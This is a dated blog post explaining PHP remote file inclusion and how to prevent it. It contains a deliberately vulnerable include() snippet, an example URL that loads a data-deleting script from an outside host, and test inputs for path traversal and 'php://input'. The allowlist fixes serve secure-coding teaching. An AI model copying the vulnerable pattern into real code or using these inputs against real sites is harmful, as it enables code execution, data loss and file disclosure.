Sunday, April 7, 2013

Remote Code Injection

In some applications, the developer includes files dynamically, taking the name of the file to include from a URL argument.

For example, see the following URLs.

  1. /index.php?page=dashboard.php
  2. /index.php?page=change_password.php
  3. /index.php?page=buynow.php

// Vulnerable: the request value is passed to include() unchecked
$file = $_GET['page'];
include($file);

In the code above, the developer includes a file that depends on the page argument in the URI.

This approach has a very serious problem if someone puts an external URL in the page argument.
See the example below:
/index.php?page=http://example.php/delete_all.php

When the above URL is requested, index.php includes the delete_all.php file from another server, and that file contains dangerous code that deletes all the data.
This is known as Remote Code Injection.

In Remote Code Injection, the attacker supplies his own code, which may harm the website.

How to avoid Remote Code Injection:
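// Only files on this list may be included
$includeFiles = array('dashboard.php', 'change_password.php', 'buynow.php');
$file = isset($_GET['page']) ? $_GET['page'] : '';
// Strict comparison, so only an exact string match passes
if (in_array($file, $includeFiles, true)) {
    include($file);
} else {
    include('filenotfound.php');
}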
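
An added example, not code from the original post: a stricter form of the allowlist above, in which the request value is used only as a lookup key and the path given to include() always comes from the application. The page keys, the pages/ directory, the resolve_page() helper and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: allowlist lookup for the ?page= parameter.
// Page keys, file names and the pages/ directory are assumptions.
const PAGES = [
    'dashboard'       => 'dashboard.php',
    'change_password' => 'change_password.php',
    'buynow'          => 'buynow.php',
];

/**
 * Map the untrusted ?page= value to a file chosen by the application.
 * The request value is only ever used as an array key, never as a path.
 */
function resolve_page($requested, string $baseDir): string
{
    $fallback = $baseDir . '/filenotfound.php';
    // ?page[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested)) {
        return $fallback;
    }
    // Accept the old "dashboard.php" style links as well as bare keys.
    $key = preg_replace('/\.php\z/', '', $requested);
    if (!array_key_exists($key, PAGES)) {
        return $fallback;
    }
    return $baseDir . '/' . PAGES[$key];
}

// Constructed sample inputs: two legitimate requests and four hostile ones.
$samples = [
    'dashboard.php',
    'buynow',
    'http://example.php/delete_all.php',
    '../../etc/passwd',
    'php://input',
    ['dashboard.php'],
];
foreach ($samples as $value) {
    $shown = is_string($value) ? $value : json_encode($value);
    printf("%-40s => %s\n", $shown, resolve_page($value, __DIR__ . '/pages'));
}

// Defence in depth: with allow_url_include off, include() refuses http:// and
// ftp:// targets even if a check like the one above is missing somewhere else.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    echo "WARNING: allow_url_include is enabled\n";
}
```

Only the first two sample values resolve to a real page; every other value, including the external URL from the post, resolves to filenotfound.php.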



